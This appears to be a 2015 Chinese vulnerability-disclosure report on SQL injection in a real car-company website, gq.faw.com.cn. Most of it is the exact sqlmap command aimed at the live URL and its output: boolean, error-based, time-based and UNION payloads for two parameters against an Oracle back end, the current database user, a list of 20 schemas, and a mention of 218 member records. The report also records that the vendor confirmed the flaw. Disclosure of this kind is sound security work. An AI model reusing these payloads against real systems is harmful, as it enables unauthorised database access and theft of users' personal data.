2015-11-04: 细节已通知厂商并且等待厂商处理中 2015-11-05: 厂商已经确认,细节仅向厂商公开 2015-11-15: 细节向核心白帽子及相关领域专家公开 2015-11-25: 细节向普通白帽子公开 2015-12-05: 细节向实习白帽子公开 2015-12-20: 细节向公众公开
218个会员信息
地址 http://gq.faw.com.cn/
sqlmap -u "http://gq.faw.com.cn/module/pageNews_fwcz.jsp?pageFile=pageNews_fwcz&covered_area1=0&covered_area2=100000&price1=0&price2=10000000&Key=&page=1&link_css=style6"参数 covered_area2,price2均可注入
Parameter: covered_area2 (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pageFile=pageNews_fwcz&covered_area1=0&covered_area2=100000 AND 2761=2761&price1=0&price2=10000000&Key=&page=1&link_css=style6 Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: pageFile=pageNews_fwcz&covered_area1=0&covered_area2=100000 AND 4056=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(107)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (4056=4056) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(122)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL)&price1=0&price2=10000000&Key=&page=1&link_css=style6 Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: pageFile=pageNews_fwcz&covered_area1=0&covered_area2=100000 AND 6703=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(118)||CHR(98)||CHR(65),5)&price1=0&price2=10000000&Key=&page=1&link_css=style6 Type: UNION query Title: Generic UNION query (NULL) - 45 columns Payload: pageFile=pageNews_fwcz&covered_area1=0&covered_area2=-9807 UNION ALL SELECT NULL,NULL,NULL,CHR(113)||CHR(122)||CHR(107)||CHR(107)||CHR(113)||CHR(66)||CHR(120)||CHR(107)||CHR(86)||CHR(101)||CHR(113)||CHR(77)||CHR(87)||CHR(102)||CHR(72)||CHR(113)||CHR(106)||CHR(122)||CHR(122)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- &price1=0&price2=10000000&Key=&page=1&link_css=style6Parameter: price2 (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pageFile=pageNews_fwcz&covered_area1=0&covered_area2=100000&price1=0&price2=10000000 AND 4335=4335&Key=&page=1&link_css=style6 Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: pageFile=pageNews_fwcz&covered_area1=0&covered_area2=100000&price1=0&price2=10000000 AND 1379=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(107)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (1379=1379) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(122)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL)&Key=&page=1&link_css=style6---web application technology: Servlet 2.4, JSP, JSP 2.0, Apache 2.2.15back-end DBMS: Oraclecurrent user: 'CCGQ'
available databases [20]:[*] CCGQ[*] CTXSYS[*] DBSNMP[*] DJBXJJ[*] DMSYS[*] EXFSYS[*] FAWJF[*] MDSYS[*] MJWW[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] SCOTT[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WEBUNION[*] WMSYS[*] XDB
部分会员
危害等级:中
漏洞Rank:10
确认时间:2015-11-05 08:54
已经提交网站运维人员进行处理。
暂无